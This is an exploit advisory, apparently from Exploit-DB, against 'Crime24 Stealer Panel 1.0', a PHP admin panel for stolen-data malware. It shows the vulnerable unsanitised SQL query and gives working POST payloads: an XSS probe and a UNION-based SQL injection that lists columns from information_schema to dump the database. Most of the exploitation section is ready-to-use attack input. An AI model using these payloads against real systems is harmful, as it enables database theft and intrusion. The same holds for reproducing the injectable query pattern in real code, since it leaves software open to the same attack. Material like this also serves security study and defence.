Crime24 Stealer Panel 1.0 - Multiple Vulnerabilities

EDB-ID:

33156

CVE:





Platform:

PHP

Date:

2014-05-03


#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#  ____        _           _          ____              
# |  _ \  __ _(_)___ _   _| | _____  |  _ \  __ _ _ __   
# | | | |/ _` | / __| | | | |/ / _ \ | | | |/ _` | '_ \  
# | |_| | (_| | \__ \ |_| |   <  __/ | |_| | (_| | | | |
# |____/ \__,_|_|___/\__,_|_|\_\___| |____/ \__,_|_| |_|
#        
#     #CyberNinja | My katana can slay any security!
#         >> Twitter @TheHackersBay
#             >> Pentester / Underground hacker
#
# Exploit Title: Crime24 Stealer Panel <= Multiple Vulnerabilities
# Date: Sunday May 3 2014
# Exploit Author: Daisuke Dan
# Vendor Homepage: Crime24.net
# Version: v.1
# Tested on: Windows Seven
# Blog post: http://thehackersbay.org/blog/2014/05/03/crime24-stealer-panel/
#
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

An attacker can execute an XSS and inject sql commands in the search form.
You must be logged in the admin panel.

#=========================== EXPLOITATION ==============================

0x01 Detecting the error

POST: http://site.com/?action=search
POST Content: q='"><img+src=x+onerror=prompt('DaisukeDan');>&in=1&search=Search
Example: http://i.imgur.com/zyIr5xv.png
Result: Cross site scripting + SQL error


0x02 Exploit the SQL Injection

[+] Vulnerable code:
$result = mysql_query("SELECT * FROM `logs` WHERE `".$cols[$_POST["in"]]."` LIKE '%".$_POST["q"]."%';", $mysql);

POST: http://site.com/?action=search			
POST Content:
q=' union select 1,2,group_concat(column_name,0x0a),4,5,6,7,8 from information_schema.columns where table_name=0x6c6f6773-- -
&in=1&search=Search
Example: http://i.imgur.com/t4ydLsR.png
You have access to all the database.


#=========================== Gr33tz =============================#
| Raw-x | eth0 | Downfall | XzLt | Insider | rootaccess | Yasker |
| EZiX | Negative | ajkaro | Un0wn_X | H4T | NeTwork | Pent0thal |
#================================================================#